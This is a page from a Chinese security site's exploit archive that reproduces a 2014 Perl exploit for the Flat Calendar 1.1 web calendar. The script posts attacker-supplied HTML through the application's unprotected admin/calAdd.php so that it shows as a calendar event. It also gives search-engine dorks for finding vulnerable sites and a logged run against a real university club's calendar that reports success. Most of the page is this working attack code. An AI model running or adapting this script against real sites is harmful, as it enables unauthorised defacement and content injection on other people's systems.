首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Flat Calendar 1.1 HTML Injection
来源:http://milw00rm.com 作者:ZoRLu 发布时间:2014-12-09  
#!/usr/bin/perl -w
#Title		: Flat Calendar v1.1 HTML Injection Exploit
#Download	: http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip
#Author		: ZoRLu / zorlu@milw00rm.com
#Website	: http://milw00rm.com / its online
#Twitter	: https://twitter.com/milw00rm or @milw00rm
#Test		: Windows7 Ultimate
#Date		: 08/12/2014
#Thks		: exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
#BkiAdam	: Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
#Dork1      : intext:"Flat Calendar is powered by Flat File DB"
#Dork2      : inurl:"viewEvent.php?eventNumber="
#
#C:\Users\admin\Desktop>perl flat.pl
#
#Usage: perl flat.pl http://target.com /calender_path/ indexfile nickname
#Exam1: perl flat.pl http://localhost / index.html ZoRLu
#Exam2: perl flat.pl http://localhost /calendar/ index.html ZoRLu
#
#C:\Users\admin\Desktop>perl flat.pl http://jcbc.jesus.cam.ac.uk /member_content/diaries/womens/calendar/ index.html ZoRLu
#
#[+] Target: http://jcbc.jesus.cam.ac.uk
#[+] Path: /member_content/diaries/womens/calendar/
#[+] index: index.html
#[+] Nick: ZoRLu
#[+] Exploit Succes
#[+] Searching url...
#[+] YourEventNumber = 709
#[+] http://jcbc.jesus.cam.ac.uk/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709

use HTTP::Request::Common qw( POST );
use LWP::UserAgent;
use IO::Socket;
use strict;
use warnings;

sub hlp() {

system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "\nUsage: perl ___FCKpd___0 http://target.com /calender_path/ indexfile nickname\n";
print "Exam1: perl ___FCKpd___0 http://localhost / index.html ZoRLu\n";
print "Exam2: perl ___FCKpd___0 http://localhost /calendar/ index.html ZoRLu\n";

}

if(@ARGV != 4)	{

hlp();
exit();

}

my $ua = LWP::UserAgent->new; 
my $url = $ARGV[0];
my $path = $ARGV[1];
my $index = $ARGV[2];
my $nick = $ARGV[3];
my $vuln = $url . $path . "admin/calAdd.php";

print "\n[+] Target: ".$url."\n";
print "[+] Path: ".$path."\n";
print "[+] index: ".$index."\n";
print "[+] Nick: ".$nick."\n";

my @months = qw(January February March April May June July August September October November December);
my ($day, $month, $yearset) = (localtime)[3,4,5];
my $year = 1900 + $yearset;
my $moon = $months[$month];

if (open(my $fh, $index)) {
 
while (my $row = <$fh>) {
chomp $row;
 
my $req = POST $vuln, [
   event => 'Test Page',
   description => $row,
   month => $moon,
   day => $day,
   year => $year,
   submitted => $nick,
];
 			 
 
my $resp = $ua->request($req);
if ($resp->is_success) {
    my $message = $resp->decoded_content;
	my $regex = "Record Added: taking you back";
	if ($message =~ /$regex/) {
	print "[+] Exploit Succes\n";
	
	my $newua = LWP::UserAgent->new( );
	my $newurl = $url . $path . "calendar.php";
	my $newreq = $newua->get($newurl);
	if ($newreq->is_success) {
	my $newmessage = $newreq->decoded_content;
	
	my $first = rindex($newmessage,"viewEvent.php?eventNumber=");
               print "[+] Searching url...\n";
         my $request = substr($newmessage, $first+26, 4);
         print "[+] YourEventNumber = $request\n";
		 sleep(1);
		 print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request."\n";
		 
		 }
		 
else {
    print "[-] HTTP POST error code: ", $newreq->code, "\n";
    print "[-] HTTP POST error message: ", $newreq->message, "\n";
}
		
	}
	else {
	
	print "[-] Exploit Failed";
	
	}
}
else {
    print "[-] HTTP POST error code: ", $resp->code, "\n";
    print "[-] HTTP POST error message: ", $resp->message, "\n";
  }
 }
}
else { 

sleep(1);
die ("[-] NotFound: $index\n");

}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Tiny Server 1.1.9 - Arbitrary
·BulletProof FTP Client 2010 Bu
·Windows Kerberos - Elevation o
·VFU 4.10-1.1 - Buffer Overflow
·Microsoft Windows Win32k.sys -
·Advantech AdamView 4.30.003 -
·IBM Endpoint Manager For Mobil
·WordPress WP Symposium 14.11 S
·IPUX CL5452/CL5132 IP Camera S
·Tuleap PHP Unserialize Code Ex
·IPUX CS7522/CS2330/CS2030 IP C
·Wordpress Download Manager 2.7
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved